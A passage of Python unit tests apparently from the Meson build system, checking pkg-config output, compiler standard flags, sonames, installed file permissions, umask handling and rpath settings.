    out = self._run(cmd + ['--print-requires'], override_envvars=env).strip().split('\n')
    # OpenBSD's pkg-config prints version constraints without spaces.
    if not is_openbsd():
        self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
    else:
        self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
    cmd = ['pkg-config', 'requires-private-test']
    out = self._run(cmd + ['--print-requires-private'], override_envvars=env).strip().split('\n')
    if not is_openbsd():
        self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo >= 1.0', 'libhello']))
    else:
        self.assertEqual(sorted(out), sorted(['libexposed', 'libfoo>=1.0', 'libhello']))
    # Link order of public libraries must be preserved.
    cmd = ['pkg-config', 'pub-lib-order']
    out = self._run(cmd + ['--libs'], override_envvars=env).strip().split()
    self.assertEqual(out, ['-llibmain2', '-llibinternal'])
    # See common/44 pkgconfig-gen/meson.build for description of the case this test
    with open(os.path.join(privatedir1, 'simple2.pc')) as f:
        content = f.read()
        self.assertIn('Libs: -L${libdir} -lsimple2 -lsimple1', content)
        self.assertIn('Libs.private: -lz', content)
    with open(os.path.join(privatedir1, 'simple3.pc')) as f:
        content = f.read()
        self.assertEqual(1, content.count('-lsimple3'))
    with open(os.path.join(privatedir1, 'simple5.pc')) as f:
        content = f.read()
        self.assertNotIn('-lstat2', content)
@mock.patch.dict(os.environ)
def test_pkgconfig_uninstalled(self):
    '''
    Build one project's uninstalled .pc files and consume them from a
    second project by pointing PKG_CONFIG_LIBDIR at meson-uninstalled.
    '''
    testdir = os.path.join(self.common_test_dir, '44 pkgconfig-gen')
    self.init(testdir)
    self.build()
    uninstalled_dir = os.path.join(self.builddir, 'meson-uninstalled')
    os.environ['PKG_CONFIG_LIBDIR'] = uninstalled_dir
    if is_cygwin():
        # The uninstalled DLLs live in the build dir; make them loadable.
        os.environ['PATH'] += os.pathsep + self.builddir
    self.new_builddir()
    testdir = os.path.join(self.common_test_dir, '44 pkgconfig-gen', 'dependencies')
    self.init(testdir)
    self.build()
    self.run_tests()
def test_pkg_unfound(self):
    '''
    A pkg-config file generated while a dependency was not found must not
    leak that dependency's placeholder name into the output.
    '''
    testdir = os.path.join(self.unit_test_dir, '23 unfound pkgconfig')
    self.init(testdir)
    # Explicit encoding for consistency with the other file reads in this
    # suite and independence from the ambient locale.
    with open(os.path.join(self.privatedir, 'somename.pc'), encoding='utf-8') as f:
        pcfile = f.read()
    # assertNotIn reports the haystack on failure, unlike
    # assertFalse('...' in pcfile).
    self.assertNotIn('blub_blob_blib', pcfile)
def test_vala_c_warnings(self):
    '''
    Test that no warnings are emitted for C code generated by Vala. This
    can't be an ordinary test case because we need to inspect the compiler
    database.
    https://github.com/mesonbuild/meson/issues/864
    '''
    if not shutil.which('valac'):
        raise unittest.SkipTest('valac not installed.')
    testdir = os.path.join(self.vala_test_dir, '5 target glib')
    self.init(testdir)
    compdb = self.get_compdb()
    vala_command = None
    c_command = None
    # Pick out the compile command for the Vala-generated C file and the
    # hand-written C file; anything else in the compdb is unexpected.
    for each in compdb:
        if each['file'].endswith('GLib.Thread.c'):
            vala_command = each['command']
        elif each['file'].endswith('GLib.Thread.vala'):
            continue
        elif each['file'].endswith('retcode.c'):
            c_command = each['command']
        else:
            m = 'Unknown file {!r} in vala_c_warnings test'.format(each['file'])
            raise AssertionError(m)
    self.assertIsNotNone(vala_command)
    self.assertIsNotNone(c_command)
    # -w suppresses all warnings, should be there in Vala but not in C
    self.assertIn(" -w ", vala_command)
    self.assertNotIn(" -w ", c_command)
    # -Wall enables all warnings, should be there in C but not in Vala
    self.assertNotIn(" -Wall ", vala_command)
    self.assertIn(" -Wall ", c_command)
    # -Werror converts warnings to errors, should always be there since it's
    # injected by an unrelated piece of code and the project has werror=true
    self.assertIn(" -Werror ", vala_command)
    self.assertIn(" -Werror ", c_command)
@skipIfNoPkgconfig
def test_qtdependency_pkgconfig_detection(self):
    '''
    Check that the qt4 and qt5 dependencies are found via pkg-config.
    '''
    # Probe which Qt versions pkg-config itself knows about.
    qt4_found = subprocess.call(['pkg-config', '--exists', 'QtCore']) == 0
    qt5_found = subprocess.call(['pkg-config', '--exists', 'Qt5Core']) == 0
    testdir = os.path.join(self.framework_test_dir, '4 qt')
    self.init(testdir, extra_args=['-Dmethod=pkg-config'])
    # The meson log must attribute each found Qt to pkg-config.
    mesonlog = self.get_meson_log()
    if qt4_found:
        self.assertRegex('\n'.join(mesonlog),
                         r'Run-time dependency qt4 \(modules: Core\) found: YES 4.* \(pkg-config\)')
    if qt5_found:
        self.assertRegex('\n'.join(mesonlog),
                         r'Run-time dependency qt5 \(modules: Core\) found: YES 5.* \(pkg-config\)')
@skip_if_not_base_option('b_sanitize')
def test_generate_gir_with_address_sanitizer(self):
    '''GIR generation must still work when ASan instrumentation is on.'''
    # ASan is unavailable on Cygwin and unsupported on OpenBSD.
    if is_cygwin():
        raise unittest.SkipTest('asan not available on Cygwin')
    if is_openbsd():
        raise unittest.SkipTest('-fsanitize=address is not supported on OpenBSD')
    testdir = os.path.join(self.framework_test_dir, '7 gnome')
    extra_args = ['-Db_sanitize=address', '-Db_lundef=false']
    self.init(testdir, extra_args=extra_args)
    self.build()
def test_qt5dependency_qmake_detection(self):
    '''
    Test that qt5 detection with qmake works. This can't be an ordinary
    test case because it involves setting the environment.
    '''
    # Verify that qmake is for Qt5
    if not shutil.which('qmake-qt5'):
        if not shutil.which('qmake'):
            raise unittest.SkipTest('QMake not found')
        output = subprocess.getoutput('qmake --version')
        if 'Qt version 5' not in output:
            raise unittest.SkipTest('Qmake found, but it is not for Qt 5.')
    # Disable pkg-config codepath and force searching with qmake/qmake-qt5
    testdir = os.path.join(self.framework_test_dir, '4 qt')
    self.init(testdir, extra_args=['-Dmethod=qmake'])
    # Confirm that the dependency was found with qmake
    mesonlog = self.get_meson_log()
    self.assertRegex('\n'.join(mesonlog),
                     r'Run-time dependency qt5 \(modules: Core\) found: YES .* \(qmake\)\n')
def test_qt6dependency_qmake_detection(self):
    '''
    Test that qt6 detection with qmake works. This can't be an ordinary
    test case because it involves setting the environment.
    '''
    # Verify that qmake is for Qt6 (comment previously said Qt5 — the
    # code below checks for Qt 6).
    if not shutil.which('qmake-qt6'):
        if not shutil.which('qmake'):
            raise unittest.SkipTest('QMake not found')
        output = subprocess.getoutput('qmake --version')
        if 'Qt version 6' not in output:
            raise unittest.SkipTest('Qmake found, but it is not for Qt 6.')
    # Disable pkg-config codepath and force searching with qmake/qmake-qt6
    testdir = os.path.join(self.framework_test_dir, '4 qt')
    self.init(testdir, extra_args=['-Dmethod=qmake'])
    # Confirm that the dependency was found with qmake
    mesonlog = self.get_meson_log()
    self.assertRegex('\n'.join(mesonlog),
                     r'Run-time dependency qt6 \(modules: Core\) found: YES .* \(qmake\)\n')
def glob_sofiles_without_privdir(self, g):
    '''Glob *g*, dropping Meson private directories (paths ending in ".p").'''
    return [path for path in glob(g) if not path.endswith('.p')]
def _test_soname_impl(self, libpath, install):
    '''
    Shared driver checking sonames, version symlinks and file counts for
    the '1 soname' project, either in the build dir or (when *install*
    is true) in the install tree at *libpath*.
    '''
    if is_cygwin() or is_osx():
        raise unittest.SkipTest('Test only applicable to ELF and linuxlike sonames')
    testdir = os.path.join(self.unit_test_dir, '1 soname')
    self.init(testdir)
    self.build()
    if install:
        self.install()
    # File without aliases set.
    nover = os.path.join(libpath, 'libnover.so')
    self.assertPathExists(nover)
    self.assertFalse(os.path.islink(nover))
    self.assertEqual(get_soname(nover), 'libnover.so')
    self.assertEqual(len(self.glob_sofiles_without_privdir(nover[:-3] + '*')), 1)
    # File with version set
    verset = os.path.join(libpath, 'libverset.so')
    self.assertPathExists(verset + '.4.5.6')
    self.assertEqual(os.readlink(verset), 'libverset.so.4')
    self.assertEqual(get_soname(verset), 'libverset.so.4')
    # real file + 2 symlinks
    self.assertEqual(len(self.glob_sofiles_without_privdir(verset[:-3] + '*')), 3)
    # File with soversion set
    soverset = os.path.join(libpath, 'libsoverset.so')
    self.assertPathExists(soverset + '.1.2.3')
    self.assertEqual(os.readlink(soverset), 'libsoverset.so.1.2.3')
    self.assertEqual(get_soname(soverset), 'libsoverset.so.1.2.3')
    self.assertEqual(len(self.glob_sofiles_without_privdir(soverset[:-3] + '*')), 2)
    # File with version and soversion set to same values
    settosame = os.path.join(libpath, 'libsettosame.so')
    self.assertPathExists(settosame + '.7.8.9')
    self.assertEqual(os.readlink(settosame), 'libsettosame.so.7.8.9')
    self.assertEqual(get_soname(settosame), 'libsettosame.so.7.8.9')
    self.assertEqual(len(self.glob_sofiles_without_privdir(settosame[:-3] + '*')), 2)
    # File with version and soversion set to different values
    bothset = os.path.join(libpath, 'libbothset.so')
    self.assertPathExists(bothset + '.1.2.3')
    # Symlink chain: .so -> .so.1.2.3 -> .so.4.5.6
    self.assertEqual(os.readlink(bothset), 'libbothset.so.1.2.3')
    self.assertEqual(os.readlink(bothset + '.1.2.3'), 'libbothset.so.4.5.6')
    self.assertEqual(get_soname(bothset), 'libbothset.so.1.2.3')
    self.assertEqual(len(self.glob_sofiles_without_privdir(bothset[:-3] + '*')), 3)
def test_soname(self):
    # Check sonames/symlinks for the uninstalled libraries in the build dir.
    self._test_soname_impl(self.builddir, False)
def test_installed_soname(self):
    # self.prefix is presumably absolute, so os.path.join(prefix, libdir)
    # is absolute too; plain string concatenation (not os.path.join)
    # deliberately re-roots that path under the staging installdir.
    libdir = self.installdir + os.path.join(self.prefix, self.libdir)
    self._test_soname_impl(libdir, True)
def test_compiler_check_flags_order(self):
    '''
    Test that compiler check flags override all other flags. This can't be
    an ordinary test case because it needs the environment to be set.
    '''
    testdir = os.path.join(self.common_test_dir, '36 has function')
    env = get_fake_env(testdir, self.builddir, self.prefix)
    cpp = env.detect_cpp_compiler(MachineChoice.HOST)
    Oflag = '-O3'
    OflagCPP = Oflag
    if cpp.get_id() in ('clang', 'gcc'):
        # prevent developers from adding "int main(int argc, char **argv)"
        # to small Meson checks unless these parameters are actually used
        OflagCPP += ' -Werror=unused-parameter'
    env = {'CFLAGS': Oflag,
           'CXXFLAGS': OflagCPP}
    self.init(testdir, override_envvars=env)
    cmds = self.get_meson_log_compiler_checks()
    for cmd in cmds:
        # Strip the ccache wrapper so cmd[0] is the real compiler.
        if cmd[0] == 'ccache':
            cmd = cmd[1:]
        # Verify that -I flags from the `args` kwarg are first
        # This is set in the '36 has function' test case
        self.assertEqual(cmd[1], '-I/tmp')
        # Verify that -O3 set via the environment is overridden by -O0
        # (check flags must come last, so the last -O wins).
        Oargs = [arg for arg in cmd if arg.startswith('-O')]
        self.assertEqual(Oargs, [Oflag, '-O0'])
def _test_stds_impl(self, testdir: str, compiler: 'Compiler') -> None:
    '''
    Shared driver: configure *testdir* once per -std= value the compiler
    advertises, check the flag appears in the compile command, then
    verify that an invalid -std coming from the environment fails setup.
    '''
    # Per-standard availability; for clang _clang_at_least's second
    # argument covers Apple clang's differing version scheme.
    has_cpp17 = (compiler.get_id() not in {'clang', 'gcc'} or
                 compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=5.0.0', '>=9.1') or
                 compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=5.0.0'))
    has_cpp2a_c17 = (compiler.get_id() not in {'clang', 'gcc'} or
                     compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=6.0.0', '>=10.0') or
                     compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
    has_cpp20 = (compiler.get_id() not in {'clang', 'gcc'} or
                 compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=10.0.0', None) or
                 compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=10.0.0'))
    has_c18 = (compiler.get_id() not in {'clang', 'gcc'} or
               compiler.get_id() == 'clang' and _clang_at_least(compiler, '>=8.0.0', '>=11.0') or
               compiler.get_id() == 'gcc' and version_compare(compiler.version, '>=8.0.0'))
    # Check that all the listed -std=xxx options for this compiler work just fine when used
    # https://en.wikipedia.org/wiki/Xcode#Latest_versions
    # https://www.gnu.org/software/gcc/projects/cxx-status.html
    key = OptionKey('std', lang=compiler.language)
    for v in compiler.get_options()[key].choices:
        # we do it like this to handle gnu++17,c++17 and gnu17,c17 cleanly
        # thus, C++ first
        if '++17' in v and not has_cpp17:
            continue
        elif '++2a' in v and not has_cpp2a_c17: # https://en.cppreference.com/w/cpp/compiler_support
            continue
        elif '++20' in v and not has_cpp20:
            continue
        # now C
        elif '17' in v and not has_cpp2a_c17:
            continue
        elif '18' in v and not has_c18:
            continue
        self.init(testdir, extra_args=[f'-D{key!s}={v}'])
        cmd = self.get_compdb()[0]['command']
        # c++03 and gnu++03 are not understood by ICC, don't try to look for them
        skiplist = frozenset([
            ('intel', 'c++03'),
            ('intel', 'gnu++03')])
        if v != 'none' and not (compiler.get_id(), v) in skiplist:
            # Surrounding spaces ensure a whole-argument match.
            cmd_std = f" -std={v} "
            self.assertIn(cmd_std, cmd)
        try:
            self.build()
        except Exception:
            # Identify which std value broke the build before re-raising.
            print(f'{key!s} was {v!r}')
            raise
        self.wipe()
    # Check that an invalid std option in CFLAGS/CPPFLAGS fails
    # Needed because by default ICC ignores invalid options
    cmd_std = '-std=FAIL'
    if compiler.language == 'c':
        env_flag_name = 'CFLAGS'
    elif compiler.language == 'cpp':
        env_flag_name = 'CXXFLAGS'
    else:
        raise NotImplementedError(f'Language {compiler.language} not defined.')
    env = {}
    env[env_flag_name] = cmd_std
    with self.assertRaises((subprocess.CalledProcessError, mesonbuild.mesonlib.EnvironmentException),
                           msg='C compiler should have failed with -std=FAIL'):
        self.init(testdir, override_envvars = env)
        # ICC won't fail in the above because additional flags are needed to
        # make unknown -std=... options errors.
        self.build()
def test_compiler_c_stds(self):
    '''
    Every C standard advertised by the detected compiler must be usable.
    Has to be a unit test because options must be passed to meson itself.
    '''
    testdir = os.path.join(self.common_test_dir, '1 trivial')
    env = get_fake_env(testdir, self.builddir, self.prefix)
    compiler = env.detect_c_compiler(MachineChoice.HOST)
    self._test_stds_impl(testdir, compiler)
def test_compiler_cpp_stds(self):
    '''
    Every C++ standard advertised by the detected compiler must be
    usable. Has to be a unit test because options must be passed to
    meson itself.
    '''
    testdir = os.path.join(self.common_test_dir, '2 cpp')
    env = get_fake_env(testdir, self.builddir, self.prefix)
    compiler = env.detect_cpp_compiler(MachineChoice.HOST)
    self._test_stds_impl(testdir, compiler)
def test_unity_subproj(self):
    '''
    --unity=subprojects must generate unity sources for subproject
    targets only, never for the main project.
    '''
    testdir = os.path.join(self.common_test_dir, '42 subproject')
    self.init(testdir, extra_args='--unity=subprojects')

    def single_private_dir(pattern):
        # Exactly one private dir may match the given glob pattern.
        matches = glob(os.path.join(self.builddir, pattern))
        self.assertEqual(len(matches), 1)
        return matches[0]

    simpletest_dir = single_private_dir('subprojects/sublib/simpletest*.p')
    self.assertPathExists(os.path.join(simpletest_dir, 'simpletest-unity0.c'))
    sublib_dir = single_private_dir('subprojects/sublib/*sublib*.p')
    self.assertPathExists(os.path.join(sublib_dir, 'sublib-unity0.c'))
    # The main project's target must not have been unified.
    self.assertPathDoesNotExist(os.path.join(self.builddir, 'user@exe/user-unity.c'))
    self.build()
def test_installed_modes(self):
    '''
    Test that files installed by these tests have the correct permissions.
    Can't be an ordinary test because our installed_files.txt is very basic.
    '''
    # Test file modes
    testdir = os.path.join(self.common_test_dir, '12 data')
    self.init(testdir)
    self.install()
    f = os.path.join(self.installdir, 'etc', 'etcfile.dat')
    found_mode = stat.filemode(os.stat(f).st_mode)
    want_mode = 'rw------T'
    # [1:] strips the file-type character from the filemode string.
    self.assertEqual(want_mode, found_mode[1:])
    f = os.path.join(self.installdir, 'usr', 'bin', 'runscript.sh')
    statf = os.stat(f)
    found_mode = stat.filemode(statf.st_mode)
    want_mode = 'rwxr-sr-x'
    self.assertEqual(want_mode, found_mode[1:])
    if os.getuid() == 0:
        # The chown failed nonfatally if we're not root
        self.assertEqual(0, statf.st_uid)
        self.assertEqual(0, statf.st_gid)
    # A file installed without an explicit mode keeps the source mode.
    f = os.path.join(self.installdir, 'usr', 'share', 'progname',
                     'fileobject_datafile.dat')
    orig = os.path.join(testdir, 'fileobject_datafile.dat')
    statf = os.stat(f)
    statorig = os.stat(orig)
    found_mode = stat.filemode(statf.st_mode)
    orig_mode = stat.filemode(statorig.st_mode)
    self.assertEqual(orig_mode[1:], found_mode[1:])
    self.assertEqual(os.getuid(), statf.st_uid)
    if os.getuid() == 0:
        # The chown failed nonfatally if we're not root
        self.assertEqual(0, statf.st_gid)
    self.wipe()
    # Test directory modes
    testdir = os.path.join(self.common_test_dir, '59 install subdir')
    self.init(testdir)
    self.install()
    f = os.path.join(self.installdir, 'usr', 'share', 'sub1', 'second.dat')
    statf = os.stat(f)
    found_mode = stat.filemode(statf.st_mode)
    want_mode = 'rwxr-x--t'
    self.assertEqual(want_mode, found_mode[1:])
    if os.getuid() == 0:
        # The chown failed nonfatally if we're not root
        self.assertEqual(0, statf.st_uid)
def test_installed_modes_extended(self):
    '''
    Test that files are installed with correct permissions using install_mode.
    '''
    testdir = os.path.join(self.common_test_dir, '190 install_mode')
    self.init(testdir)
    self.build()
    self.install()
    # Each entry is (path relative to the usr prefix, full filemode string
    # including the leading file-type character). The 'S'/'T' letters check
    # that setgid/sticky bits are applied even without the execute bit.
    for fsobj, want_mode in [
            ('bin', 'drwxr-x---'),
            ('bin/runscript.sh', '-rwxr-sr-x'),
            ('bin/trivialprog', '-rwxr-sr-x'),
            ('include', 'drwxr-x---'),
            ('include/config.h', '-rw-rwSr--'),
            ('include/rootdir.h', '-r--r--r-T'),
            ('lib', 'drwxr-x---'),
            ('lib/libstat.a', '-rw---Sr--'),
            ('share', 'drwxr-x---'),
            ('share/man', 'drwxr-x---'),
            ('share/man/man1', 'drwxr-x---'),
            ('share/man/man1/foo.1', '-r--r--r-T'),
            ('share/sub1', 'drwxr-x---'),
            ('share/sub1/second.dat', '-rwxr-x--t'),
            ('subdir', 'drwxr-x---'),
            ('subdir/data.dat', '-rw-rwSr--'),
    ]:
        f = os.path.join(self.installdir, 'usr', *fsobj.split('/'))
        found_mode = stat.filemode(os.stat(f).st_mode)
        self.assertEqual(want_mode, found_mode,
                         msg=('Expected file %s to have mode %s but found %s instead.' %
                              (fsobj, want_mode, found_mode)))
    # Ensure that introspect --installed works on all types of files
    # FIXME: also verify the files list
    self.introspect('--installed')
def test_install_umask(self):
    '''
    Test that files are installed with correct permissions using default
    install umask of 022, regardless of the umask at time the worktree
    was checked out or the build was executed.
    '''
    # Copy source tree to a temporary directory and change permissions
    # there to simulate a checkout with umask 002.
    orig_testdir = os.path.join(self.unit_test_dir, '26 install umask')
    # Create a new testdir under tmpdir.
    tmpdir = os.path.realpath(tempfile.mkdtemp())
    self.addCleanup(windows_proof_rmtree, tmpdir)
    testdir = os.path.join(tmpdir, '26 install umask')
    # Copy the tree using shutil.copyfile, which will use the current umask
    # instead of preserving permissions of the old tree.
    save_umask = os.umask(0o002)
    # Restore the process umask even if the test fails below.
    self.addCleanup(os.umask, save_umask)
    shutil.copytree(orig_testdir, testdir, copy_function=shutil.copyfile)
    # Preserve the executable status of subdir/sayhello though.
    os.chmod(os.path.join(testdir, 'subdir', 'sayhello'), 0o775)
    self.init(testdir)
    # Run the build under a 027 umask now.
    os.umask(0o027)
    self.build()
    # And keep umask 027 for the install step too.
    self.install()
    # Executables must come out 0755 despite the restrictive build umask.
    for executable in [
            'bin/prog',
            'share/subdir/sayhello',
    ]:
        f = os.path.join(self.installdir, 'usr', *executable.split('/'))
        found_mode = stat.filemode(os.stat(f).st_mode)
        want_mode = '-rwxr-xr-x'
        self.assertEqual(want_mode, found_mode,
                         msg=('Expected file %s to have mode %s but found %s instead.' %
                              (executable, want_mode, found_mode)))
    # Directories created by the installer must be 0755 as well.
    for directory in [
            'usr',
            'usr/bin',
            'usr/include',
            'usr/share',
            'usr/share/man',
            'usr/share/man/man1',
            'usr/share/subdir',
    ]:
        f = os.path.join(self.installdir, *directory.split('/'))
        found_mode = stat.filemode(os.stat(f).st_mode)
        want_mode = 'drwxr-xr-x'
        self.assertEqual(want_mode, found_mode,
                         msg=('Expected directory %s to have mode %s but found %s instead.' %
                              (directory, want_mode, found_mode)))
    # Plain data files must be 0644.
    for datafile in [
            'include/sample.h',
            'share/datafile.cat',
            'share/file.dat',
            'share/man/man1/prog.1',
            'share/subdir/datafile.dog',
    ]:
        f = os.path.join(self.installdir, 'usr', *datafile.split('/'))
        found_mode = stat.filemode(os.stat(f).st_mode)
        want_mode = '-rw-r--r--'
        self.assertEqual(want_mode, found_mode,
                         msg=('Expected file %s to have mode %s but found %s instead.' %
                              (datafile, want_mode, found_mode)))
def test_cpp_std_override(self):
    '''
    Test that a per-target `override_options` C++ standard wins over the
    project default, and that werror is only applied where requested.
    '''
    testdir = os.path.join(self.unit_test_dir, '6 std override')
    self.init(testdir)
    compdb = self.get_compdb()
    # Don't try to use -std=c++03 as a check for the
    # presence of a compiler flag, as ICC does not
    # support it.
    # Initialize explicitly so a missing compdb entry produces a clear
    # assertion failure instead of a NameError below.
    c98_comp = None
    c11_comp = None
    plain_comp = None
    for i in compdb:
        if 'prog98' in i['file']:
            c98_comp = i['command']
        if 'prog11' in i['file']:
            c11_comp = i['command']
        if 'progp' in i['file']:
            plain_comp = i['command']
    self.assertIsNotNone(c98_comp)
    self.assertIsNotNone(c11_comp)
    self.assertIsNotNone(plain_comp)
    self.assertNotEqual(len(plain_comp), 0)
    self.assertIn('-std=c++98', c98_comp)
    self.assertNotIn('-std=c++11', c98_comp)
    self.assertIn('-std=c++11', c11_comp)
    self.assertNotIn('-std=c++98', c11_comp)
    self.assertNotIn('-std=c++98', plain_comp)
    self.assertNotIn('-std=c++11', plain_comp)
    # Now werror
    self.assertIn('-Werror', plain_comp)
    self.assertNotIn('-Werror', c98_comp)
def test_run_installed(self):
    '''
    Test that an installed executable has its build-dir rpath stripped:
    it must fail to run without LD_LIBRARY_PATH and succeed with it.
    '''
    if is_cygwin() or is_osx():
        raise unittest.SkipTest('LD_LIBRARY_PATH and RPATH not applicable')
    testdir = os.path.join(self.unit_test_dir, '7 run installed')
    self.init(testdir)
    self.build()
    self.install()
    installed_exe = os.path.join(self.installdir, 'usr/bin/prog')
    installed_libdir = os.path.join(self.installdir, 'usr/foo')
    installed_lib = os.path.join(installed_libdir, 'libfoo.so')
    self.assertTrue(os.path.isfile(installed_exe))
    self.assertTrue(os.path.isdir(installed_libdir))
    self.assertTrue(os.path.isfile(installed_lib))
    # Must fail when run without LD_LIBRARY_PATH to ensure that
    # rpath has been properly stripped rather than pointing to the builddir.
    self.assertNotEqual(subprocess.call(installed_exe, stderr=subprocess.DEVNULL), 0)
    # When LD_LIBRARY_PATH is set it should start working.
    # For some reason setting LD_LIBRARY_PATH in os.environ fails
    # when all tests are run (but works when only this test is run),
    # but doing this explicitly works.
    env = os.environ.copy()
    env['LD_LIBRARY_PATH'] = ':'.join([installed_libdir, env.get('LD_LIBRARY_PATH', '')])
    self.assertEqual(subprocess.call(installed_exe, env=env), 0)
    # Ensure that introspect --installed works
    installed = self.introspect('--installed')
    for v in installed.values():
        self.assertTrue('prog' in v or 'foo' in v)
@skipIfNoPkgconfig
def test_order_of_l_arguments(self):
    '''
    Test that -L and -l linker arguments keep their required relative
    order in the generated ninja file.
    '''
    testdir = os.path.join(self.unit_test_dir, '8 -L -l order')
    self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
    # NOTE: .pc file has -Lfoo -lfoo -Lbar -lbar but pkg-config reorders
    # the flags before returning them to -Lfoo -Lbar -lfoo -lbar
    # but pkgconf seems to not do that. Sigh. Support both.
    # Each pair (a, b) asserts that a appears before b on the link line.
    expected_order = [('-L/me/first', '-lfoo1'),
                      ('-L/me/second', '-lfoo2'),
                      ('-L/me/first', '-L/me/second'),
                      ('-lfoo1', '-lfoo2'),
                      ('-L/me/second', '-L/me/third'),
                      ('-L/me/third', '-L/me/fourth',),
                      ('-L/me/third', '-lfoo3'),
                      ('-L/me/fourth', '-lfoo4'),
                      ('-lfoo3', '-lfoo4'),
                      ]
    with open(os.path.join(self.builddir, 'build.ninja')) as ifile:
        for line in ifile:
            # Only the link rule contains the first expected flag.
            if expected_order[0][0] in line:
                for first, second in expected_order:
                    self.assertLess(line.index(first), line.index(second))
                return
    # Fail loudly if the link rule was never found at all.
    raise RuntimeError('Linker entries not found in the Ninja file.')
def test_introspect_dependencies(self):
    '''
    Tests that mesonintrospect --dependencies returns expected output.
    '''
    testdir = os.path.join(self.framework_test_dir, '7 gnome')
    self.init(testdir)
    glib_found = False
    gobject_found = False
    deps = self.introspect('--dependencies')
    self.assertIsInstance(deps, list)
    # Every dependency entry must be a dict with the mandatory keys.
    for dep in deps:
        self.assertIsInstance(dep, dict)
        self.assertIn('name', dep)
        self.assertIn('compile_args', dep)
        self.assertIn('link_args', dep)
        if dep['name'] == 'glib-2.0':
            glib_found = True
        elif dep['name'] == 'gobject-2.0':
            gobject_found = True
    self.assertTrue(glib_found)
    self.assertTrue(gobject_found)
    if subprocess.call(['pkg-config', '--exists', 'glib-2.0 >= 2.56.2']) != 0:
        raise unittest.SkipTest('glib >= 2.56.2 needed for the rest')
    targets = self.introspect('--targets')
    docbook_target = None
    for t in targets:
        if t['name'] == 'generated-gdbus-docbook':
            docbook_target = t
            break
    self.assertIsInstance(docbook_target, dict)
    # Use docbook_target (not the leftover loop variable) for the final
    # check; the original relied on `t` still aliasing it after `break`.
    self.assertEqual(os.path.basename(docbook_target['filename'][0]),
                     'generated-gdbus-doc-' + os.path.basename(docbook_target['target_sources'][0]['sources'][0]))
def test_introspect_installed(self):
    '''
    Test that introspect --installed reports the expected set of library
    file names (including version/soversion aliases) per platform.
    '''
    testdir = os.path.join(self.linuxlike_test_dir, '7 library versions')
    self.init(testdir)
    install = self.introspect('--installed')
    # Keys are build-dir paths; reduce them to basenames for comparison.
    install = {os.path.basename(k): v for k, v in install.items()}
    print(install)
    if is_osx():
        the_truth = {
            'libmodule.dylib': '/usr/lib/libmodule.dylib',
            'libnoversion.dylib': '/usr/lib/libnoversion.dylib',
            'libonlysoversion.5.dylib': '/usr/lib/libonlysoversion.5.dylib',
            'libonlysoversion.dylib': '/usr/lib/libonlysoversion.dylib',
            'libonlyversion.1.dylib': '/usr/lib/libonlyversion.1.dylib',
            'libonlyversion.dylib': '/usr/lib/libonlyversion.dylib',
            'libsome.0.dylib': '/usr/lib/libsome.0.dylib',
            'libsome.dylib': '/usr/lib/libsome.dylib',
        }
        the_truth_2 = {'/usr/lib/libsome.dylib',
                       '/usr/lib/libsome.0.dylib',
                       }
    else:
        the_truth = {
            'libmodule.so': '/usr/lib/libmodule.so',
            'libnoversion.so': '/usr/lib/libnoversion.so',
            'libonlysoversion.so': '/usr/lib/libonlysoversion.so',
            'libonlysoversion.so.5': '/usr/lib/libonlysoversion.so.5',
            'libonlyversion.so': '/usr/lib/libonlyversion.so',
            'libonlyversion.so.1': '/usr/lib/libonlyversion.so.1',
            'libonlyversion.so.1.4.5': '/usr/lib/libonlyversion.so.1.4.5',
            'libsome.so': '/usr/lib/libsome.so',
            'libsome.so.0': '/usr/lib/libsome.so.0',
            'libsome.so.1.2.3': '/usr/lib/libsome.so.1.2.3',
        }
        the_truth_2 = {'/usr/lib/libsome.so',
                       '/usr/lib/libsome.so.0',
                       '/usr/lib/libsome.so.1.2.3'}
    self.assertDictEqual(install, the_truth)
    # The 'some' target must also list all its install aliases.
    targets = self.introspect('--targets')
    for t in targets:
        if t['name'] != 'some':
            continue
        self.assertSetEqual(the_truth_2, set(t['install_filename']))
def test_build_rpath(self):
    '''
    Test that build_rpath is used in the build tree and replaced by
    install_rpath on install.
    '''
    if is_cygwin():
        raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
    testdir = os.path.join(self.unit_test_dir, '10 build_rpath')
    self.init(testdir)
    self.build()
    # In the build tree both binaries carry the build_rpath entries.
    build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
    self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
    build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
    self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar')
    self.install()
    # After install only the install_rpath remains; the two targets use
    # different install_rpath values ('/baz' vs 'baz') on purpose.
    install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
    self.assertEqual(install_rpath, '/baz')
    install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
    self.assertEqual(install_rpath, 'baz')
@skipIfNoPkgconfig
def test_build_rpath_pkgconfig(self):
    '''
    Test that current build artefacts (libs) are found first on the rpath,
    manually specified rpath comes second and additional rpath elements (from
    pkg-config files) come last
    '''
    if is_cygwin():
        raise unittest.SkipTest('Windows PE/COFF binaries do not use RPATH')
    testdir = os.path.join(self.unit_test_dir, '90 pkgconfig build rpath order')
    self.init(testdir, override_envvars={'PKG_CONFIG_PATH': testdir})
    self.build()
    # Build tree: $ORIGIN/sub (build artefacts) < /foo/bar (manual)
    # < /foo/dummy (from pkg-config).
    build_rpath = get_rpath(os.path.join(self.builddir, 'prog'))
    self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar:/foo/dummy')
    build_rpath = get_rpath(os.path.join(self.builddir, 'progcxx'))
    self.assertEqual(build_rpath, '$ORIGIN/sub:/foo/bar:/foo/dummy')
    self.install()
    # Installed: install_rpath first, pkg-config rpath still appended.
    install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/prog'))
    self.assertEqual(install_rpath, '/baz:/foo/dummy')
    install_rpath = get_rpath(os.path.join(self.installdir, 'usr/bin/progcxx'))
